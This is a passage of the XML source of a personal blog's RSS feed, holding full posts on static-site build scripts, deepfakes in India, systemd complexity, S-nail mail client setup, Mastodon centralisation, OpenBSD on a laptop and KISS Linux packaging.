pages/blog/feed.xml (view raw)
1<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
2 <channel>
3 <title>icyphox's blog</title>
4 <link>https://icyphox.sh/</link>
5 <description>Computers, security and computer security.</description>
6 <atom:link href="https://icyphox.sh/blog/feed.xml" rel="self" type="application/xml"/>
7 <image>
8 <title>icyphox logo</title>
9 <url>https://icyphox.sh/icyphox.png</url>
10 <link>https://icyphox.sh/</link>
11 </image>
12 <language>en-us</language>
13 <copyright>Creative Commons BY-NC-SA 4.0</copyright>
14 <item><title>Site changes</title><description><![CDATA[<p>The past couple of days, I’ve spent a fair amount of time tweaking this
15site. My site’s build process involves
16<a href="https://github.com/icyphox/vite">vite</a> and a bunch of
17<a href="https://github.com/icyphox/site/tree/master/bin">scripts</a>. These
18scripts are executed via vite’s pre- and post-build actions. The big
19changes that were made were performance improvements in the
20<code>update_index.py</code> script, and the addition of <code>openring.py</code>, which you
21can see at the very bottom of this post!</p>
22
23<h2 id="speeding-up-index-page-generation">speeding up index page generation</h2>
24
25<p>The old script—the one that featured in <a href="/blog/hacky-scripts">Hacky
26scripts</a>—was absolutely ridiculous, and not to
27mention <em>super</em> slow. Here’s what it did:</p>
28
29<ul>
30<li>got the most recent file (latest post) by sorting all posts by
31<code>mtime</code>.</li>
32<li>parsed the markdown frontmatter and created a markdown table entry
33like: </li>
34</ul>
35
36<div class="codehilite"><pre><span></span><code><span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"| [</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'title'</span><span class="p">]</span><span class="si">}</span><span class="s2">](</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s2">) | `</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'date'</span><span class="p">]</span><span class="si">}</span><span class="s2">` |"</span>
37</code></pre></div>
38
39<ul>
40<li>updated the markdown table (in <code>_index.md</code>) by in-place editing the
41markdown, with the line created earlier—for the latest post.</li>
42<li>finally, I’d have to <em>rebuild</em> the entire site since this markdown
43hackery would happen at the very end of the build, i.e, didn’t
44actually get rendered itself. </li>
45</ul>
46
47<p>That…probably didn’t make much sense to you, did it? Don’t bother.
48I don’t know what I was thinking when I wrote that mess. So with how it
49<em>was</em> done aside, here’s how it’s done now:</p>
50
51<ul>
52<li>the metadata for all posts are nicely fetched and sorted using
53<code>python-frontmatter</code>.</li>
54<li>the metadata list is fed into Jinja for use in templating, and is
55rendered very nicely using a simple <code>for</code> expression:</li>
56</ul>
57
58<pre><code>{% for p in posts %}
59 <tr>
60 <td align="left"><a href="/blog/{{ p.url }}">{{ p.title }}</a></td>
61 <td align="right">{{ p.date }}</td>
62 </tr>
63{% endfor %}
64</code></pre>
65
66<p>A neat thing I learnt while working with Jinja, is you can use
67<code>DebugUndefined</code> in your <code>jinja2.Environment</code> definition to ignore
68uninitialized template variables. Jinja’s default behaviour is to remove
69all uninitialized variables from the template output. So for instance,
70if you had:</p>
71
72<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">body</span><span class="p">></span>
73 {{ body }}
74<span class="p"></</span><span class="nt">body</span><span class="p">></span>
75
76<span class="p"><</span><span class="nt">footer</span><span class="p">></span>
77 {{ footer }}
78<span class="p"></</span><span class="nt">footer</span><span class="p">></span>
79</code></pre></div>
80
81<p>And only <code>{{ body }}</code> was initialized in your <code>template.render(body=body)</code>,
82the output you get would be:</p>
83
84<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">body</span><span class="p">></span>
85 Hey there!
86<span class="p"></</span><span class="nt">body</span><span class="p">></span>
87<span class="p"><</span><span class="nt">footer</span><span class="p">></span>
88
89<span class="p"></</span><span class="nt">footer</span><span class="p">></span>
90</code></pre></div>
91
92<p>This is annoying if you’re attempting to generate your template across
93multiple stages, as I was. Now, I initialize my Jinja environment like
94so:</p>
95
96<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">jinja2</span> <span class="kn">import</span> <span class="n">DebugUndefined</span>
97
98<span class="n">env</span> <span class="o">=</span> <span class="n">jinja2</span><span class="o">.</span><span class="n">Environment</span><span class="p">(</span><span class="n">loader</span><span class="o">=</span><span class="n">template_loader</span><span class="p">,</span><span class="n">undefined</span><span class="o">=</span><span class="n">DebugUndefined</span><span class="p">)</span>
99</code></pre></div>
100
101<p>I use the same trick for <code>openring.py</code> too. Speaking of…let’s talk
102about <code>openring.py</code>!</p>
103
104<h2 id="the-new-webring-thing-at-the-bottom">the new webring thing at the bottom</h2>
105
106<p>After having seen Drew’s <a href="https://git.sr.ht/~sircmpwn/openring">openring</a>,
107my <a href="https://en.wikipedia.org/wiki/Not_invented_here">NIH</a> kicked in and I wrote
108<a href="https://github.com/icyphox/openring.py"><code>openring.py</code></a>. It pretty much
109does the exact same thing, except it’s a little more composable with
110vite. Currently, it reads a random sample of 3 feeds from a list of
111feeds provided in a <code>feeds.txt</code> file, and updates the webring with those
112posts. Like a feed-bingo of sorts. ;)</p>
113
114<p>I really like how it turned out—especially the fact that I got my CSS
115grid correct in the first try!</p>
116]]></description><link>https://icyphox.sh/blog/site-changes</link><pubDate>Wed, 27 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/site-changes</guid></item><item><title>The efficacy of deepfakes</title><description><![CDATA[<p>A few days back, NPR put out an article discussing why deepfakes aren’t
117all that powerful in spreading disinformation.
118<a href="https://www.npr.org/2020/05/07/851689645/why-fake-video-audio-may-not-be-as-powerful-in-spreading-disinformation-as-feare">Link to article</a>.</p>
119
120<p>According to the article:</p>
121
122<blockquote>
123 <p>“We’ve already passed the stage at which they would have been most
124 effective,” said Keir Giles, a Russia specialist with the Conflict
125 Studies Research Centre in the United Kingdom. “They’re the dog that
126 never barked.”</p>
127</blockquote>
128
129<p>I agree. This might be the case when it comes to Russian influence.
130There are simpler, more cost-effective ways to conduct <a href="https://en.wikipedia.org/wiki/Active_measures">active
131measures</a>, like memes.
132Besides, America already has the infrastructure in place to combat
133influence ops, and have been doing so for a while now. </p>
134
135<p>However, there are certain demographics whose governments may not have
136the capability to identify and perform damage control when
137a disinformation campaign hits, let alone deepfakes. An example of this
138demographic: India.</p>
139
140<h2 id="the-indian-landscape">the Indian landscape</h2>
141
142<p>The disinformation problem in India is way more sophisticated, and
143harder to combat than in the West. There are a couple of reasons for
144this:</p>
145
146<ul>
147<li>The infrastructure for fake news already exists: WhatsApp</li>
148<li>Fact checking media in 22 different languages is non-trivial</li>
149</ul>
150
151<p>India has had a long-standing problem with misinformation. The 2019
152elections, the recent CAA controversy and even more recently—the
153coronavirus. In some cases, it has even lead to
154<a href="https://www.npr.org/2018/07/18/629731693/fake-news-turns-deadly-in-india">mob violence</a>.</p>
155
156<p>All of this shows that the populace is easily influenced, and deepfakes
157are only going to simplify this. What’s worse is explaining to a rural
158crowd that something like a deepfake can exist—comprehension and
159adoption of technology has always been slow in India, and can be
160attributed to socio-economic factors. </p>
161
162<p>There also exists a majority of the population that’s already been
163influenced to a certain degree: the right wing. A deepfake of a Muslim
164leader trashing Hinduism will be eaten up instantly. They are inclined
165to believe it is true, by virtue of prior influence and given the
166present circumstances.</p>
167
168<h2 id="countering-deepfakes">countering deepfakes</h2>
169
170<p>The thing about deepfakes is the tech to spot them already exists. In
171fact, some can even be eyeballed. Deepfake imagery tends to have weird
172artifacting, which can be noticed upon closer inspection. Deepfake
173videos, of people specifically, blink / move weirdly. The problem at
174hand, however, is the general public cannot be expected to notice these
175at a quick glance, and the task of proving a fake is left to researchers
176and fact checkers.</p>
177
178<p>Further, India does not have the infrastructure to combat deepfakes at
179scale. By the time a research group / think tank catches wind of it, the
180damage is likely already done. Besides, disseminating contradictory
181information, i.e. “this video is fake”, is also a task of its own.
182Public opinion has already been swayed, and the brain dislikes
183contradictions.</p>
184
185<h2 id="why-havent-we-seen-it-yet">why haven’t we seen it yet?</h2>
186
187<p>Creating a deepfake isn’t trivial. Rather, creating a <em>convincing</em> one
188isn’t. I would also assume that most political propaganda outlets are
189just large social media operations. They lack the technical prowess and
190/ or the funding to produce a deepfake. This doesn’t mean they can’t
191ever. </p>
192
193<p>It goes without saying, but this post isn’t specific to India. I’d say
194other countries with a similar socio-economic status are in a similar
195predicament. Don’t write off deepfakes as a non-issue just because
196America did.</p>
197]]></description><link>https://icyphox.sh/blog/efficacy-deepfakes</link><pubDate>Mon, 11 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/efficacy-deepfakes</guid></item><item><title>Simplicity (mostly) guarantees security</title><description><![CDATA[<p>Although it is a very comfy one, it’s not just an aesthetic. Simplicity
198and minimalism, in technology, is great for security too. I say “mostly”
199in the title because human error cannot be discounted, and nothing is
200perfect. However, the simpler your tech stack is, it is inherentely more
201secure than complex monstrosities.</p>
202
203<p>Let’s look at systemd, for example. It’s got over 1.2 million
204lines of code. “Hurr durr but LoC doesn’t mean anything!” Sure ok, but
205can you <em>imagine</em> auditing this? How many times has it even been
206audited? I couldn’t find any audit reports. No, the developers are not
207security engineers and a trustworthy audit must be done by
208a third-party. What’s scarier, is this thing runs on a huge percentage
209of the world’s critical infrastructure and contains privileged core
210subsystems. </p>
211
212<p>“B-but Linux is much bigger!” Indeed, it is, but it has a thousand times
213(if not more) the number of eyes looking at the code, and there have been
214multiple third-party audits. There are hundreds of independent orgs and
215multiple security teams looking at it. That’s not the case with
216systemd—it’s probably just RedHat.</p>
217
218<p>Compare this to a bunch of shell scripts. Agreed, writing safe shell can
219be hard and there are a ton of weird edge-cases depending on your shell
220implementation, but the distinction here is <em>you</em> wrote it. Which means,
221you can identify what went wrong—things are predictable.
222systemd, however, is a large blackbox, and its state at runtime is largely
223unprovable and unpredictable. I am certain even the developers don’t
224know.</p>
225
226<p>And this is why I whine about complexity so much. A complex,
227unpredictable system is nothing more than a large attack surface. Drew
228DeVault, head of <a href="https://sourcehut.org">sourcehut</a> wrote something
229similar (yes that’s the link, yes it has a typo).: </p>
230
231<p><a href="https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/">https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/</a></p>
232
233<p>He manually provisions all
234sourcehut infrastructure, because tools like Salt, Kubernetes etc. are
235just like systemd in our example—large monstrosities which can get you
236RCE’d. Don’t believe me? See
237<a href="https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/">this</a>.</p>
238
239<p><em>This was day 3 of the #100DaysToOffload challenge. It came out like
240a systemd-hate post, but really, I couldn’t think of a better example.</em></p>
241]]></description><link>https://icyphox.sh/blog/simplicity-security</link><pubDate>Thu, 07 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/simplicity-security</guid></item><item><title>The S-nail mail client</title><description><![CDATA[<p>TL;DR: Here’s my <a href="https://github.com/icyphox/dotfiles/blob/master/home/.mailrc"><code>.mailrc</code></a>.</p>
242
243<p>As I’d mentioned in my blog post about <a href="/blog/mael">mael</a>, I’ve been on
244the lookout for a good, usable mail client. As it happens, I found
245S-nail just as I was about to give up on mael. Turns out writing an MUA
246isn’t all too easy after all. S-nail turned out to be the perfect client
247for me, but I had to invest quite some time in reading the <a href="https://www.sdaoden.eu/code-nail.html">very
248thorough manual</a> and exchanging
249emails with its <a href="https://www.sdaoden.eu">very friendly author</a>. I did it
250so you don’t have to<sup class="footnote-ref" id="fnref-read-man"><a href="#fn-read-man">1</a></sup>, and I present to you
251this guide.</p>
252
253<h2 id="basic-settings">basic settings</h2>
254
255<p>These settings below should guarantee some sane defaults to get started
256with. Comments added for context.</p>
257
258<pre><code># enable upward compatibility with S-nail v15.0
259set v15-compat
260
261# charsets we send mail in
262set sendcharsets=utf-8,iso-8859-1
263
264# reply back in sender's charset
265set reply-in-same-charset
266
267# prevent stripping of full names in replies
268set fullnames
269
270# adds a 'Mail-Followup-To' header; useful in mailing lists
271set followup-to followup-to-honour-ask-yes
272
273# asks for an attachment after composing
274set askattach
275
276# marks a replied message as answered
277set markanswered
278
279# honors the 'Reply-To' header
280set reply-to-honour
281
282# automatically launches the editor while composing mail interactively
283set editalong
284
285# I didn't fully understand this :)
286set history-gabby=all
287
288# command history storage
289set history-file=~/.s-nailhist
290
291# sort mail by date (try 'thread' for threaded view)
292set autosort=date
293</code></pre>
294
295<h2 id="authentication">authentication</h2>
296
297<p>With these out of the way, we can move on to configuring our
298account—authenticating IMAP and SMTP. Before that, however, we’ll
299have to create a <code>~/.netrc</code> file to store our account credentials. </p>
300
301<p>(This of course, assumes that your SMTP and IMAP credentials are the
302same. I don’t know what to do otherwise. )</p>
303
304<pre><code>machine *.domain.tld login user@domain.tld password hunter2
305</code></pre>
306
307<p>Once done, encrypt this file using <code>gpg</code> / <code>gpg2</code>. This is optional, but
308recommended.</p>
309
310<pre><code>$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc
311</code></pre>
312
313<p>You can now delete the plaintext <code>.netrc</code> file. Now add these lines to
314your <code>.mailrc</code>:</p>
315
316<pre><code>set netrc-lookup
317set netrc-pipe='gpg2 -qd ~/.netrc.gpg'
318</code></pre>
319
320<p>Before we define our account block, add these two lines for a nicer IMAP
321experience:</p>
322
323<pre><code>set imap-cache=~/.cache/nail
324set imap-keepalive=240
325</code></pre>
326
327<p>Defining an account is dead simple. </p>
328
329<pre><code>account "personal" {
330 localopts yes
331 set from="Your Name <user@domain.tld>"
332 set folder=imaps://imap.domain.tld:993
333
334 # copy sent messages to Sent; '+' indicates subdir of 'folder'
335 set record=+Sent
336 set inbox=+INBOX
337
338 # optionally, set this to 'smtps' and change the port accordingly
339 # remove 'smtp-use-starttls'
340 set mta=smtp://smtp.domain.tld:587 smtp-use-starttls
341
342 # couple of shortcuts to useful folders
343 shortcut sent +Sent \
344 inbox +INBOX \
345 drafts +Drafts \
346 trash +Trash \
347 archives +Archives
348}
349
350# enable account on startup
351account personal
352</code></pre>
353
354<p>You might also want to trash mail, instead of perma-deleting them
355(<code>delete</code> does that). To achieve this, we define an alias:</p>
356
357<pre><code>define trash {
358 move "$@" +Trash
359}
360
361commandalias del call trash
362</code></pre>
363
364<p>Replace <code>+Trash</code> with the relative path to your trash folder.</p>
365
366<h2 id="aesthetics">aesthetics</h2>
367
368<p>The fun stuff. I don’t feel like explaining what these do (hint: I don’t
369fully understand it either), so just copy-paste it and mess around with
370the colors:</p>
371
372<pre><code># use whatever symbol you fancy
373set prompt='> '
374
375colour 256 sum-dotmark ft=bold,fg=13 dot
376colour 256 sum-header fg=007 older
377colour 256 sum-header bg=008 dot
378colour 256 sum-header fg=white
379colour 256 sum-thread bg=008 dot
380colour 256 sum-thread fg=cyan
381</code></pre>
382
383<p>The prompt can be configured more extensively, but I don’t need it. Read
384the man page if you do.</p>
385
386<h2 id="essential-commands">essential commands</h2>
387
388<p>Eh, you can just read the man page, I guess. But here’s a quick list off
389the top of my head:</p>
390
391<ul>
392<li><code>headers</code>: Lists all messages, with the date, subject etc.</li>
393<li><code>mail</code>: Compose mail.</li>
394<li><code><number></code>: Read mail by specifiying its number on the message list.</li>
395<li><code>delete <number></code>: Delete mail.</li>
396<li><code>new <number></code>: Mark as new (unread).</li>
397<li><code>file <shortcut or path to folder></code>: Change folders. For example: <code>file
398sent</code></li>
399</ul>
400
401<p>That’s all there is to it.</p>
402
403<p><em>This is day 2 of the #100DaysToOffload challenge. I didn’t think I’d
404participate, until today. So yesterday’s post is day 1. Will I keep at
405it? I dunno. We’ll see.</em></p>
406
407<div class="footnotes">
408<hr />
409<ol>
410<li id="fn-read-man">
411<p>Honestly, read the man page (and email Steffen!)—there’s
412a ton of useful options in there. <a href="#fnref-read-man" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
413</li>
414</ol>
415</div>
416]]></description><link>https://icyphox.sh/blog/s-nail</link><pubDate>Wed, 06 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/s-nail</guid></item><item><title>Stop joining mastodon.social</title><description><![CDATA[<p>No, really. Do you actually understand why the Mastodon network exists,
417and what it stands for, or are you just LARPing? If you’re going to just
418cross-post from Twitter, why are you even on Mastodon?</p>
419
420<p>Okay, so Mastodon is a “federated network”. What does that mean? You
421have a bunch of instances, each having their own userbase, and each
422instance <em>federates</em> with other instances, forming a distributed
423network. Got that? Cool. Now let’s get to the problem with
424mastodon.social.</p>
425
426<p>mastodon.social is the instance run by the lead developer. Why does
427everybody flock to it? I’m really not sure, but if I were to hazard
428a guess, I’d say it’s because people don’t really understand federation.
429“Oh, big instance? I should probably join that.” Herd mentality?
430I dunno.</p>
431
432<p>And what happens when every damn user joins just one instance? It becomes
433more Twitter, that’s what. The federation is gone. Nearly all activity
434is generated from just one instance. Here are some numbers:</p>
435
436<ul>
437<li>Total number of users on Mastodon: ~2.2 million.</li>
438<li>Number of users on mastodon.social: 529923</li>
439</ul>
440
441<p>Surprisingly, there’s an instance even bigger than
442mastodon.social—pawoo.net. I have no idea why it’s so big and it’s
443primarily Japanese. Its user count is over 620k. So mastodon.social and
444pawoo.net put together form over 1 million users, that’s <em>more than</em> 50%
445of the entire Mastodon populace. That’s nuts.<sup class="footnote-ref" id="fnref-federation-fallacy"><a href="#fn-federation-fallacy">1</a></sup></p>
446
447<p>And you’re only enabling this centralization by joining mastodon.social! Really, what
448even <em>is there</em> on mastodon.social? Have you even seen its local
449timeline? Probably not. Join an instance with more flavor. Are you into,
450say, the BSDs? Join bsd.network. Free software? fosstodon.org. Or host
451your own for yourself and your friends. </p>
452
453<p>If you really do care about decentralization and freedom, and aren’t
454just memeing to look cool on Twitter, then move your account to another
455instance.<sup class="footnote-ref" id="fnref-move-account"><a href="#fn-move-account">2</a></sup></p>
456
457<div class="footnotes">
458<hr />
459<ol>
460<li id="fn-federation-fallacy">
461<p><a href="https://rosenzweig.io/blog/the-federation-fallacy.html">https://rosenzweig.io/blog/the-federation-fallacy.html</a> <a href="#fnref-federation-fallacy" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
462</li>
463
464<li id="fn-move-account">
465<p>Go to <code>/settings/migration</code> from your instance’s web
466page. <a href="#fnref-move-account" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
467</li>
468</ol>
469</div>
470]]></description><link>https://icyphox.sh/blog/mastodon-social</link><pubDate>Tue, 05 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mastodon-social</guid></item><item><title>OpenBSD on the HP Envy 13</title><description><![CDATA[<p>My existing KISS install broke because I thought it would be a great
471idea to have <a href="https://github.com/alpinelinux/apk-tools">apk-tools</a>
472alongside the <code>kiss</code> package manager. It’s safe to say, that did not end
473well—especially when I installed, and then removed a package. With
474a semi-broken install that I didn’t feel like fixing, I figured I’d give
475OpenBSD a try. And I did.</p>
476
477<h2 id="installation-and-setup">installation and setup</h2>
478
479<p>Ran into some trouble booting off the USB initially, turned out to be
480a faulty stick. Those things aren’t built to last, sadly. Flashed a new
481stick, booted up. Setup was pleasant, very straightforward. Didn’t
482really have to intervene much.</p>
483
484<p>After booting in, I was greeted with a very archaic looking FVWM
485desktop. It’s not the prettiest thing, and especially annoying to work
486with when you don’t have your mouse setup, i.e. no tap-to-click. </p>
487
488<p>I needed wireless, and my laptop doesn’t have an Ethernet port. USB
489tethering just works, but the connection kept dying. I’m not sure why.
490Instead, I downloaded the <a href="http://man.openbsd.org/iwm.4">iwm(4)</a>
491firmware from <a href="http://firmware.openbsd.org/firmware/6.6/">here</a>, loaded
492it up on a USB stick and copied it over to <code>/etc/firmware</code>. After that,
493it was as simple as running
494<a href="http://man.openbsd.org/fw_update.1">fw_update(1)</a>
495and the firmware is auto-detected and loaded. In fact, if you have working
496Internet, <code>fw_update</code> will download the required firmware for you, too.</p>
497
498<p>Configuring wireless is painless and I’m so glad to see that there’s no
499<code>wpa_supplicant</code> horror to deal with. It’s as simple as:</p>
500
501<pre><code>$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK
502</code></pre>
503
504<p>Also see <a href="http://man.openbsd.org/hostname.if.5">hostname.if(5)</a> to make
505this persist. After that, it’s only a matter of specifying your desired
506SSID, and <code>ifconfig</code> will automatically auth and procure an IP lease.</p>
507
508<pre><code>$ doas ifconfig iwm0 nwid YOUR_SSID
509</code></pre>
510
511<p>By now I was really starting to get exasperated by FVWM, and decided to
512switch to something nicer. I tried building 2bwm (my previous WM), but
513that failed. I didn’t bother trying to figure this out, so I figured I’d
514give <a href="http://man.openbsd.org/cwm.1">cwm(1)</a> a shot. Afterall, people
515sing high praises of it.</p>
516
517<p>And boy, is it good. The config is a breeze, and actually pretty
518powerful. <a href="https://github.com/icyphox/dotfiles/blob/master/home/.cwmrc">Here’s mine</a>.
519cwm also has a built-in launcher, so dmenu isn’t necessary anymore.
520Refer to <a href="https://man.openbsd.org/cwmrc.5">cwmrc(5)</a> for all the config
521options.</p>
522
523<p>Touchpad was pretty simple to setup too—OpenBSD has
524<a href="http://man.openbsd.org/wsconsctl.8">wsconsctl(8)</a>, which lets you set
525your tap-to-click, mouse acceleration etc. However, more advanced
526configuration can be achieved by getting Xorg to use the Synaptics
527driver. Just add a <code>70-synaptics.conf</code> to <code>/etc/X11/xorg.conf.d</code> (make
528the dir if it doesn’t exist), containing:</p>
529
530<pre><code>Section "InputClass"
531 Identifier "touchpad catchall"
532 Driver "synaptics"
533 MatchIsTouchpad "on"
534 Option "TapButton1" "1"
535 Option "TapButton2" "3"
536 Option "TapButton3" "2"
537 Option "VertEdgeScroll" "on"
538 Option "VertTwoFingerScroll" "on"
539 Option "HorizEdgeScroll" "on"
540 Option "HorizTwoFingerScroll" "on"
541 Option "VertScrollDelta" "111"
542 Option "HorizScrollDelta" "111"
543EndSection
544</code></pre>
545
546<p>There are a lot more options that can be configured, see
547<a href="http://man.openbsd.org/synaptics.4">synaptics(4)</a>.</p>
548
549<p>Suspend and hibernate just work, thanks to
550<a href="http://man.openbsd.org/apm.8">apm(8)</a>. Suspend on lid-close just needs
551one <code>sysctl</code> tweak:</p>
552
553<pre><code>$ sysctl machdep.lidaction=1
554</code></pre>
555
556<p>I believe it’s set to 1 by default on some installs, but I’m not sure.</p>
557
558<h2 id="impressions">impressions</h2>
559
560<p>I already really like the philosophy of OpenBSD—security and
561simplicity, while not losing out on sanity. The default install is
562plentiful, and has just about everything you’d need to get going.
563I especially enjoy how everything just works! I was pleasantly surprised
564to see my brightness and volume keys work without any configuration!
565It’s clear that the devs
566actually dogfood OpenBSD, unlike uh, <em>cough</em> Free- <em>cough</em>. Gosh I hope
567it’s not <em>the</em> flu. :^)</p>
568
569<p>Oh and did you notice all the manpage links I’ve littered throughout
570this post? They have manpages for <em>everything</em>; it’s ridiculous. And
571they’re very thorough. Arch Wiki is good, but it’s incorrect at times,
572or simply outdated. OpenBSD’s manpages, although catering only to
573OpenBSD have never failed me. </p>
574
575<p>Performance and battery life are fine. Battery is in fact, identical, if
576not better than on Linux. OpenBSD disables HyperThreading/SMT for
577security reasons, but you can manually enable it if you wish to do so:</p>
578
579<pre><code>$ sysctl hw.smt=1
580</code></pre>
581
582<p>Package management is probably the only place where OpenBSD falls short.
583<a href="http://man.openbsd.org/pkg_add.1">pkg_add(1)</a> isn’t particularly fast,
584considering it’s written in Perl. The ports selection is fine, I have
585yet to find something that I need not on there. I also wish they
586debloated packages; maybe I’ve just been spoilt by KISS. I now have
587D-Bus on my system thanks to Firefox. :(</p>
588
589<p>I appreciate the fact that they don’t have a political document—a Code
590of Conduct. CoCs are awful, and have only proven to be harmful for
591projects; part of the reason why I’m sick of Linux and its community.
592Oh wait, OpenBSD does have one: <a href="https://www.openbsd.org/mail.html">https://www.openbsd.org/mail.html</a>
593;)</p>
594
595<p>I’ll be exploring <a href="http://man.openbsd.org/vmd.8">vmd(8)</a> to see if I can
596get a Linux environment going. Perhaps that’ll be my next post, but when
597have I ever delivered?</p>
598
599<p>I’ll close this post off with my new rice, and a sick ASCII art I made.</p>
600
601<pre><code> \.-----./
602 / ^ ^ ^ \
603 (o)(o) ^ ^ |_/|
604 {} ^ ^ > ^| \|
605 \^ ^ ^ ^/
606 /-----\
607 ~icy
608</code></pre>
609
610<p><img src="https://x.icyphox.sh/zDYdj.png" alt="openbsd rice" /></p>
611]]></description><link>https://icyphox.sh/blog/openbsd-hp-envy</link><pubDate>Fri, 17 Apr 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/openbsd-hp-envy</guid></item><item><title>The Zen of KISS Linux</title><description><![CDATA[<p><a href="/blog/five-days-tty">I installed KISS</a> early in January on my main
612machine—an HP Envy 13 (2017), and I have since noticed a lot of changes
613in my workflow, my approach to software (and its development), and in
614life as a whole. I wouldn’t call KISS “life changing”, as that would be
615overly dramatic, but it has definitely reshaped my outlook towards
616technology—for better or worse.</p>
617
618<p>When I talk about KISS to people—online or IRL—I get some pretty
619interesting reactions and comments.<sup class="footnote-ref" id="fnref-bringing-up-kiss"><a href="#fn-bringing-up-kiss">1</a></sup>
620Ranging from “Oh cool.” to “You must be
621retarded.”, I’ve heard it all. A classic and a personal favourite of
622mine, “I don’t use meme distros because I actually get work done.” It is
623actually, quite the opposite—I’ve been so much more productive using
624KISS than any other operating system. I’ll explain why shortly.</p>
625
626<p>The beauty of this “distro”, is it isn’t much of a distribution at all.
627There is no big team, no mailing lists, no infrastructure. The entire
628setup is so loose, and this makes it very convenient to swap things out
629for alternatives. The main (and potentially community) repos all reside
630locally on your system. In the event that Dylan decides to call it
631quits and switches to Windows, we can simply just bump versions
632ourselves, locally! The <a href="https://k1ss.org/guidestones">KISS Guidestones</a>
633document is a good read.</p>
634
635<p>In the subseqent paragraphs, I’ve laid out the different things about
636KISS that stand out to me, and make using the system a lot more
637enjoyable.</p>
638
639<h2 id="the-package-system">the package system</h2>
640
641<p>Packaging for KISS has been delightful, to say the least. It takes me
642about 2 mins to write and publish a new package. Here’s the <code>radare2</code>
643package, which I maintain, for example.</p>
644
645<p>The <code>build</code> file (executable):</p>
646
647<div class="codehilite"><pre><span></span><code><span class="ch">#!/bin/sh -e</span>
648
649./configure <span class="se">\</span>
650 --prefix<span class="o">=</span>/usr
651
652make
653make <span class="nv">DESTDIR</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> install
654</code></pre></div>
655
656<p>The <code>version</code> file:</p>
657
658<pre><code>4.3.1 1
659</code></pre>
660
661<p>The <code>checksums</code> file (generated using <code>kiss checksum radare2</code>):</p>
662
663<pre><code>4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa 4.3.1.tar.gz
664</code></pre>
665
666<p>And finally, the <code>sources</code> file:</p>
667
668<pre><code>https://github.com/radareorg/radare2/archive/4.3.1.tar.gz
669</code></pre>
670
671<p>This is literally the bare minimum that you need to define a package.
672There’s also the <code>depends</code> file where you specify the dependencies for
673your package.
674<code>kiss</code> also generates a <code>manifests</code> file to track all the files and
675directories that your package creates during installation, for their
676removal, if and when that occurs. Now compare this process with any
677other distribution’s.</p>
678
679<h2 id="the-community">the community</h2>
680
681<p>As far as I know, it mostly consists of the <code>#kisslinux</code> channel on
682Freenode and the <a href="https://old.reddit.com/r/kisslinux">r/kisslinux</a>
683subreddit. It’s not that big, but it’s suprisingly active, and super
684helpful. There have been some interested new KISS-related projects
685too: <a href="https://github.com/sdsddsd1/kiss-games">kiss-games</a>—a repository
686for, well, Linux games; <a href="https://github.com/jedavies-dev/kiss-ppc64le">kiss-ppc64le</a>
687and <a href="https://github.com/jedavies-dev/kiss-aarch64">kiss-aarch64</a>—KISS
688Linux ports for PowerPC and ARM64 architectures;
689<a href="https://github.com/wyvertux/wyvertux">wyvertux</a>—an attempt at
690a GNU-free Linux distribution, using KISS as a base; and tons more.</p>
691
692<h2 id="the-philosophy">the philosophy</h2>
693
694<p>Software today is far too complex. And its complexity is only growing.
695Some might argue that this is inevitable, and it is in fact progress.
696I disagree. Blindly adding layers and layers of abstraction (Docker,
697modern web “apps") isn’t progress. Look at the Linux desktop ecosystem
698today, for example—monstrosities like GNOME and KDE are a result of
699this…new wave software engineering.</p>
700
701<p>I see KISS as a symbol of defiance against this malformed notion. You
702don’t <em>need</em> all the bloat these DEs ship with to have a usable system.
703Agreed, it’s a bit more effort to get up and running, but it is entirely
704worth it. Think of it as a clean table—feels good to sit down and work on,
705doesn’t it? </p>
706
707<p>Let’s take my own experience, for example. One of the initial few
708software I used to install on a new system was <code>dunst</code>—a notification
709daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo,
710not on KISS. However, using a system without notifications has been very
711pleasant. Nothing to distract you while you’re in the zone.</p>
712
713<p>Another instance, again involving D-Bus (or not), is Bluetooth audio. As
714it happens, my laptop’s 3.5mm jack is rekt, and I need to use Bluetooth
715for audio, if at all. Sadly, Bluetooth audio on Linux hard-depends on
716D-Bus. Bluetooth stacks that don’t rely on D-Bus do exist, like on Android,
717but porting them over to desktop is non-trivial. However, I used this to
718my advantage and decided not to consume media on my laptop. This has
719drastically boosted my productivity, since I literally cannot watch
720YouTube even if I wanted to. My laptop is now strictly work-only.
721If I do need to watch the occasional video / listen to music, I use my
722phone. Compartmentalizing work and play to separate devices has worked
723out pretty well for me.</p>
724
725<p>I’m slowly noticing myself favor low-tech (or no-tech) solutions to
726simple problems too. Like notetaking—I’ve tried plaintext files, Vim
727Wiki, Markdown, but nothing beats actually using pen and paper. Tech,
728from what I can see, doesn’t solve problems very effectively. In some
729cases, it only causes more of them. I might write another post
730discussing my thoughts on this in further detail. </p>
731
732<p>I’m not sure what I intended this post to be, but I’m pretty happy with
733the mindspill. To conclude this already long monologue, let me clarify
734one little thing y’all are probably thinking, “Okay man, are you
